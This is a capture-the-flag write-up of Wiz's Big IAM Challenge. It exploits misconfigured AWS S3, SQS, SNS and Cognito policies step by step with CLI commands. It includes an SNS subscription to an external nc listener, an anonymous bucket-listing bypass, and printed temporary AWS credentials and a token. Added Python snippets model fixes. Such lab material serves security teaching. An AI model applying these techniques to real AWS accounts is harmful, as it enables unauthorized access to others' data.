
Wiz-thebigiamchallenge

1. Part 1

Buckets of Fun

We all know that public buckets are risky. But can you find the flag?

1.1 Reviewing the permissions we have

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": "*",
      "Action": "s3:GetObject",
      "Resource": "arn:aws:s3:::thebigiamchallenge-storage-9979f4b/*"
    },
    {
      "Effect": "Allow",
      "Principal": "*",
      "Action": "s3:ListBucket",
      "Resource": "arn:aws:s3:::thebigiamchallenge-storage-9979f4b",
      "Condition": {
        "StringLike": {
          "s3:prefix": "files/*"
        }
      }
    }
  ]
}
```
  • Anyone may download (s3:GetObject) every object under thebigiamchallenge-storage-9979f4b/*
  • Anyone may list (s3:ListBucket) the bucket thebigiamchallenge-storage-9979f4b, but only keys under the files/ prefix

1.2 With these permissions, we first list the objects under thebigiamchallenge-storage-9979f4b/files/

```shell
aws s3 ls s3://thebigiamchallenge-storage-9979f4b/files/
```


1.3 We see flag1.txt, so we copy it to a writable local directory and read it

```shell
aws s3 cp s3://thebigiamchallenge-storage-9979f4b/files/flag1.txt /tmp/flag
ls /tmp
cat /tmp/flag
```


2. Part 2

Google Analytics

We created our own analytics system specifically for this challenge. We think it’s so good that we even used it on this page. What could go wrong?

Join our queue and get the secret flag.

1.1 Reviewing the permissions we have

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": "*",
      "Action": [
        "sqs:SendMessage",
        "sqs:ReceiveMessage"
      ],
      "Resource": "arn:aws:sqs:us-east-1:092297851374:wiz-tbic-analytics-sqs-queue-ca7a1b2"
    }
  ]
}
```
  • Anyone may send messages to, and receive messages from, arn:aws:sqs:us-east-1:092297851374:wiz-tbic-analytics-sqs-queue-ca7a1b2

1.2 Trying to send and receive messages

Send a hello message to the queue

```shell
aws sqs send-message --queue-url "https://sqs.us-east-1.amazonaws.com/092297851374/wiz-tbic-analytics-sqs-queue-ca7a1b2" --message-body "Hello, this is a test message!"
```

The response shows the message's MD5 and ID


Try receiving an SQS message

```shell
aws sqs receive-message --queue-url "https://sqs.us-east-1.amazonaws.com/092297851374/wiz-tbic-analytics-sqs-queue-ca7a1b2"
```

The full message structure is returned, including the ID, the receipt handle, the body MD5 and the body itself


Visiting the URL contained in the message body gives the flag


3. Part 3

Enable Push Notifications

We got a message for you. Can you get it?

1.1 Reviewing the permissions we have

```json
{
  "Version": "2008-10-17",
  "Id": "Statement1",
  "Statement": [
    {
      "Sid": "Statement1",
      "Effect": "Allow",
      "Principal": {
        "AWS": "*"
      },
      "Action": "SNS:Subscribe",
      "Resource": "arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications",
      "Condition": {
        "StringLike": {
          "sns:Endpoint": "*@tbic.wiz.io"
        }
      }
    }
  ]
}
```
  • Any AWS principal may subscribe to the specified SNS topic, as long as the subscription endpoint ends in “@tbic.wiz.io”

1.2 Trying to subscribe to the SNS topic from an endpoint

But how do we satisfy the “ends in @tbic.wiz.io” requirement? In fact, a subscription does not have to use the email protocol; we can subscribe over HTTP instead.

We can listen on an HTTP port with nc to receive the subscription messages.

Remote host:

```shell
nc -lvvp 12345
```

AWS shell:

```shell
aws sns subscribe --topic-arn "arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications" --protocol http --notification-endpoint "http://xx.xx.xx.xx:12345/@tbic.wiz.io"
```


Remote host (the URL must be quoted, otherwise the shell treats each & as a background operator):

```shell
curl "https://sns.us-east-1.amazonaws.com/?Action=ConfirmSubscription&TopicArn=arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications&Token=2336412f37fb687f5d51e6e2425ba1f2557c40cfa9296426473bebf11d61a4631e90d1a8e8a0c89c77f5f7889b5f3806f62c6e59f2fcb23e4f0860516a0fd89471bb435f88d8f9110069d9efede2fa53927c743c18502aa112d4a58ca5bcdd29e5eb600a0c37ede1492b9b437936c3bdcce0d84b70d23fa68be2b19767aa745b"
```


Listening again, we finally receive the notification message


4. Part 4

Admin only?

We learned from our mistakes from the past. Now our bucket only allows access to one specific admin user. Or does it?

1.1 Reviewing the permissions we have

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": "*",
      "Action": "s3:GetObject",
      "Resource": "arn:aws:s3:::thebigiamchallenge-admin-storage-abf1321/*"
    },
    {
      "Effect": "Allow",
      "Principal": "*",
      "Action": "s3:ListBucket",
      "Resource": "arn:aws:s3:::thebigiamchallenge-admin-storage-abf1321",
      "Condition": {
        "StringLike": {
          "s3:prefix": "files/*"
        },
        "ForAllValues:StringLike": {
          "aws:PrincipalArn": "arn:aws:iam::133713371337:user/admin"
        }
      }
    }
  ]
}
```
  • Allows every user/role to get (download) any object in the specified S3 bucket
  • Allows every user/role to list objects in the specified S3 bucket whose keys start with “files/”, but requires the calling principal to be the IAM user admin.

1.2 The multi-valued context operator ForAllValues

ForAllValues has a peculiarity: when the key being matched has no value at all, the condition still evaluates to true. A request that carries no identity information therefore passes the check and can access the S3 bucket it should not be able to.


1.3 Trying to access the S3 bucket without any identity

Use the --no-sign-request flag to access the bucket anonymously

```shell
aws s3 ls s3://thebigiamchallenge-admin-storage-abf1321/files/ --no-sign-request
```


Then, as in Part 1, copy the flag to a writable local directory and read it

```shell
aws s3 cp s3://thebigiamchallenge-admin-storage-abf1321/files/flag-as-admin.txt /tmp/flag1
cat /tmp/flag1
```
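Why the anonymous request above succeeds, as an added example that is not part of the challenge or of this writeup: a small Python model of the condition operators in the Part 3 topic policy and the Part 4 bucket policy, with a hardened variant beside each. The sns:Protocol condition key is the documented SNS key; the 203.0.113.10 endpoint and the alice@tbic.wiz.io address are constructed samples.

```python
import fnmatch

# Added example, not from the challenge: a minimal model of the IAM condition
# operators used in Parts 3 and 4. Each request-context key maps to a list of
# values; an absent key is an empty list, which is exactly what an anonymous
# (--no-sign-request) call has for aws:PrincipalArn.

def _match(operator, value, pattern):
    if operator.endswith("StringLike"):  # '*' / '?' wildcards, case-sensitive
        return fnmatch.fnmatchcase(value, pattern)
    return value == pattern              # StringEquals

def condition_matches(condition, context):
    """True when every operator/key pair in `condition` holds for `context`."""
    for operator, pairs in condition.items():
        for key, patterns in pairs.items():
            patterns = patterns if isinstance(patterns, list) else [patterns]
            hits = [any(_match(operator, v, p) for p in patterns) for v in context.get(key, [])]
            if operator.startswith("ForAllValues:"):
                ok = all(hits)  # vacuously True for an absent key: the Part 4 gap
            else:
                ok = any(hits)  # ForAnyValue and single-valued operators: absent key fails
            if not ok:
                return False
    return True

# Part 4: the bucket policy condition as published, and a fixed variant that uses
# the single-valued operator so an anonymous caller no longer matches.
WEAK_ADMIN = {"StringLike": {"s3:prefix": "files/*"},
              "ForAllValues:StringLike": {"aws:PrincipalArn": "arn:aws:iam::133713371337:user/admin"}}
FIXED_ADMIN = {"StringLike": {"s3:prefix": "files/*",
                              "aws:PrincipalArn": "arn:aws:iam::133713371337:user/admin"}}
ANON_LIST = {"s3:prefix": ["files/"]}  # no aws:PrincipalArn in the context at all
ADMIN_LIST = {"s3:prefix": ["files/"], "aws:PrincipalArn": ["arn:aws:iam::133713371337:user/admin"]}

# Part 3: the topic policy only pattern-matches sns:Endpoint, so any protocol whose
# endpoint string ends in "@tbic.wiz.io" qualifies; pinning sns:Protocol closes that.
# The endpoint values below are constructed samples.
WEAK_SNS = {"StringLike": {"sns:Endpoint": "*@tbic.wiz.io"}}
FIXED_SNS = {"StringLike": {"sns:Endpoint": "*@tbic.wiz.io"}, "StringEquals": {"sns:Protocol": "email"}}
HTTP_SUB = {"sns:Endpoint": ["http://203.0.113.10:12345/@tbic.wiz.io"], "sns:Protocol": ["http"]}
EMAIL_SUB = {"sns:Endpoint": ["alice@tbic.wiz.io"], "sns:Protocol": ["email"]}

if __name__ == "__main__":
    cases = [("weak admin policy, anonymous", WEAK_ADMIN, ANON_LIST), ("fixed admin policy, anonymous", FIXED_ADMIN, ANON_LIST),
             ("fixed admin policy, admin", FIXED_ADMIN, ADMIN_LIST), ("weak topic policy, http", WEAK_SNS, HTTP_SUB),
             ("fixed topic policy, http", FIXED_SNS, HTTP_SUB), ("fixed topic policy, email", FIXED_SNS, EMAIL_SUB)]
    for name, cond, ctx in cases:
        print(f"{name:32} -> {'ALLOW' if condition_matches(cond, ctx) else 'DENY'}")
```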


5. Part 5

Do I know you?

We configured AWS Cognito as our main identity provider. Let’s hope we didn’t make any mistakes.

1.1 Reviewing the permissions we have

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "VisualEditor0",
      "Effect": "Allow",
      "Action": [
        "mobileanalytics:PutEvents",
        "cognito-sync:*"
      ],
      "Resource": "*"
    },
    {
      "Sid": "VisualEditor1",
      "Effect": "Allow",
      "Action": [
        "s3:GetObject",
        "s3:ListBucket"
      ],
      "Resource": [
        "arn:aws:s3:::wiz-privatefiles",
        "arn:aws:s3:::wiz-privatefiles/*"
      ]
    }
  ]
}
```
  • Allows the mobileanalytics:PutEvents and cognito-sync:* actions.
  • Allows the s3:GetObject and s3:ListBucket actions on the wiz-privatefiles bucket.

1.2 Using F12 (developer tools) to locate the code around cognito1.png reveals sensitive code

This front-end code uses Cognito identity pool credentials to fetch cognito1.png from the S3 bucket and sets the resulting URL on the image tag; we can use the same credentials to fetch other objects.

```javascript
AWS.config.region = 'us-east-1';
AWS.config.credentials = new AWS.CognitoIdentityCredentials({IdentityPoolId: "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"});
// Set the region
AWS.config.update({region: 'us-east-1'});

$(document).ready(function() {
  var s3 = new AWS.S3();
  params = {
    Bucket: 'wiz-privatefiles',
    Key: 'cognito1.png',
    Expires: 60 * 60
  }

  signedUrl = s3.getSignedUrl('getObject', params, function (err, url) {
    $('#signedImg').attr('src', url);
  });
});
```

We first list the bucket's objects the same way, using the listObjects method

```javascript
AWS.config.region = 'us-east-1';
AWS.config.credentials = new AWS.CognitoIdentityCredentials({IdentityPoolId: "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"});
// Set the region
AWS.config.update({region: 'us-east-1'});

var s3 = new AWS.S3();
params = {
  Bucket: 'wiz-privatefiles'
}

signedUrl = s3.getSignedUrl('listObjects', params, function (err, url) {
  console.log(url);
});
```


Visiting the link shows the detailed object listing


Use the getObject method to fetch the contents of flag1.txt

```javascript
AWS.config.region = 'us-east-1';
AWS.config.credentials = new AWS.CognitoIdentityCredentials({IdentityPoolId: "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"});
// Set the region
AWS.config.update({region: 'us-east-1'});

var s3 = new AWS.S3();
params = {
  Bucket: 'wiz-privatefiles',
  Key: 'flag1.txt'
}

signedUrl = s3.getSignedUrl('getObject', params, function (err, url) {
  console.log(url);
});
```


Visiting the link returns the contents of flag1.txt


6. Part 6

One final push

Anonymous access no more. Let’s see what can you do now.

Now try it with the authenticated role: arn:aws:iam::092297851374:role/Cognito_s3accessAuth_Role

1.1 Reviewing the permissions we have

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "Federated": "cognito-identity.amazonaws.com"
      },
      "Action": "sts:AssumeRoleWithWebIdentity",
      "Condition": {
        "StringEquals": {
          "cognito-identity.amazonaws.com:aud": "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"
        }
      }
    }
  ]
}
```
  • sts:AssumeRoleWithWebIdentity is an AWS Security Token Service (STS) operation that obtains temporary security credentials for a role through web identity authentication (such as OpenID Connect or Amazon Cognito). It lets an authenticated web identity assume the specified IAM role and receive temporary credentials for accessing AWS resources for a limited time.
  • The policy also reveals our identity pool ID: us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b

1.2 Trying STS authentication to obtain credentials

First, try the call as is

```shell
aws sts assume-role-with-web-identity
```


It turns out three parameters are required

  • --role-arn arn:aws:iam::092297851374:role/Cognito_s3accessAuth_Role (given in the challenge)

  • --role-session-name: iam-final (any value)

  • --web-identity-token: obtain an identity ID from the identity pool, then obtain a token for it; earlier parts used a similar method

1.3 Obtaining the token and authenticating with STS

Get an identity ID

```shell
aws cognito-identity get-id --identity-pool-id us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b
```


Get a token

```shell
aws cognito-identity get-open-id-token --identity-id us-east-1:157d6171-eebb-c389-cc99-2f1643910337
```


Try STS authentication to obtain credentials

```shell
aws sts assume-role-with-web-identity --role-arn arn:aws:iam::092297851374:role/Cognito_s3accessAuth_Role --role-session-name iam-final --web-identity-token eyJraWQiOiJ1cy1lYXN0LTE1IiwidHlwIjoiSldTIiwiYWxnIjoiUlM1MTIifQ.eyJzdWIiOiJ1cy1lYXN0LTE6MTU3ZDYxNzEtZWUxYy1jZjVmLTAxODItNDhmYjcxOTk3NDkyIiwiYXVkIjoidXMtZWFzdC0xOmI3M2NiMmQyLTBkMDAtNGU3Ny04ZTgwLWY5OWQ5YzEzZGEzYiIsImFtciI6WyJ1bmF1dGhlbnRpY2F0ZWQiXSwiaXNzIjoiaHR0cHM6Ly9jb2duaXRvLWlkZW50aXR5LmFtYXpvbmF3cy5jb20iLCJleHAiOjE3MTIwNDA5NDIsImlhdCI6MTcxMjA0MDM0Mn0.fvdf9FUyP_jX8FlAZmPecDP2b751Y8onuxM-oDttmiFhgfrEvmtTt2WMirYknUBcPyRbxvq65sHI8gVACaSBhdvXX-hFMsufHT-zvXuqknk-tw8iQbh5R6TiqIwALFw_XKI42MwtKEwM4_rIGuWi3NfUsvCTw2ozasNUH0yHVY4i7zoZrZjK6F8FouwkCISJXg3EpFaLLGbhGZvFWPo8zXve0e2b_jvov46je9s4Bcg9P1yizVZdxPoWit3hzIhZCqcCWucXQBcHQ92iV5utBDz8UuikdAI2WfInZyEOmnfI7tD9G2GUMtbVdZ9epnbbbxe9uOBLZtvSjW0vrIFqyg
```


Set the credentials we obtained

```shell
export AWS_ACCESS_KEY_ID=ASIARK7LBOHXBDE2Z6T7
export AWS_SECRET_ACCESS_KEY=9nIvs6cieraSGqKTmcVKtnRam3GqSXH7rZkV2ZOm
export AWS_SESSION_TOKEN=<session token omitted>
```

Finally, operate on the S3 bucket with these credentials to get the flag

{wiz:open-sesame-or-shell-i-say-openid}
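Why an identity that never logged in can assume this role, as an added example that is not part of the challenge or of this writeup: decode the Cognito OpenID token obtained above (header and payload segments copied from the command, signature left out and not verified) and model the trust policy with and without the amr check. The trust_policy_allows function is hypothetical; the amr condition it models is the one AWS documents for Cognito authenticated roles.

```python
import base64
import json

# Added example, not part of the challenge: decode the Cognito OpenID token from
# Part 6 (header and payload segments copied from the page; the signature is
# left out and NOT verified, so this is for inspection only) and model why the
# role trust policy accepts it.
TOKEN_HEADER_AND_PAYLOAD = (
    "eyJraWQiOiJ1cy1lYXN0LTE1IiwidHlwIjoiSldTIiwiYWxnIjoiUlM1MTIifQ."
    "eyJzdWIiOiJ1cy1lYXN0LTE6MTU3ZDYxNzEtZWUxYy1jZjVmLTAxODItNDhmYjcxOTk3NDkyIiwiYXVkIjoidXMtZWFzdC0xOmI3M2NiMmQyLTBkMDAtNGU3Ny04ZTgwLWY5OWQ5YzEzZGEzYiIsImFtciI6WyJ1bmF1dGhlbnRpY2F0ZWQiXSwiaXNzIjoiaHR0cHM6Ly9jb2duaXRvLWlkZW50aXR5LmFtYXpvbmF3cy5jb20iLCJleHAiOjE3MTIwNDA5NDIsImlhdCI6MTcxMjA0MDM0Mn0"
)
IDENTITY_POOL = "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"

def _b64url_json(segment):
    # JWT segments are unpadded base64url; restore the padding before decoding.
    return json.loads(base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4)))

def decode_unverified(token):
    """Return (header, claims) without checking the signature."""
    header, payload = token.split(".")[:2]
    return _b64url_json(header), _b64url_json(payload)

def trust_policy_allows(claims, require_authenticated):
    """Model the trust policy on Cognito_s3accessAuth_Role (hypothetical helper).

    As published it checks only cognito-identity.amazonaws.com:aud, which every
    identity in the pool satisfies, unauthenticated ones included. The hardened
    variant adds the documented condition for authenticated roles,
    ForAnyValue:StringLike on cognito-identity.amazonaws.com:amr = "authenticated".
    """
    if claims.get("aud") != IDENTITY_POOL:
        return False
    if require_authenticated and "authenticated" not in claims.get("amr", []):
        return False
    return True

if __name__ == "__main__":
    header, claims = decode_unverified(TOKEN_HEADER_AND_PAYLOAD)
    print("alg:", header["alg"], "| amr:", claims["amr"], "| sub:", claims["sub"])
    print("aud-only trust policy        :", "ALLOW" if trust_policy_allows(claims, False) else "DENY")
    print("aud + amr=authenticated policy:", "ALLOW" if trust_policy_allows(claims, True) else "DENY")
```

Running it shows amr is ["unauthenticated"], so the published aud-only trust policy allows the assume-role call while the variant that also requires amr to contain "authenticated" denies it.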

This article is licensed under CC-BY-SA-3.0; please credit the source when reposting.
Author: Sally